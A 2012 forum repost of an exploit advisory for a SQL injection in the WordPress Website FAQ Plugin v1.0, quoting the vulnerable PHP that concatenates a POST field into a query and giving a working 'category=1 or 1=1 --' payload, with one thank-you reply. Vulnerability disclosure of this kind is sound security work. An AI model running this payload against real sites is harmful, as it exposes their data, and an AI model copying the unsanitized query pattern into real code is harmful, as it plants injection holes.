The_Arhitect Posted June 26, 2012 Report Share Posted June 26, 2012 WordPress Website FAQ Plugin v1.0 SQL Injection# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection# Date: 6/25/12# Exploit Author: Chris Kellum# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip# Version: 1.0==============================================================================Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php============================================================================== Lines 106-115: function displayAnswer() { global $wpdb; $master_table = $wpdb->prefix . "faq"; $category = $_POST['category']; $searchtxt = $_POST['searchtxt']; if($category!=0) { $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'"; }===============================================================Vulnerability Details: faq_category vulnerable to SQL injection===============================================================When submitting a query via the widget, intercept the post request via burp or other proxy to find the following: action=displayAnswer&category=1&searchtxt=[your query]Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.Sursa: WordPress Website FAQ Plugin v1.0 SQL Injection Quote Link to comment Share on other sites More sharing options...
skr3ch69 Posted July 3, 2012 Report Share Posted July 3, 2012 ...foarte util.Thanks. Quote Link to comment Share on other sites More sharing options...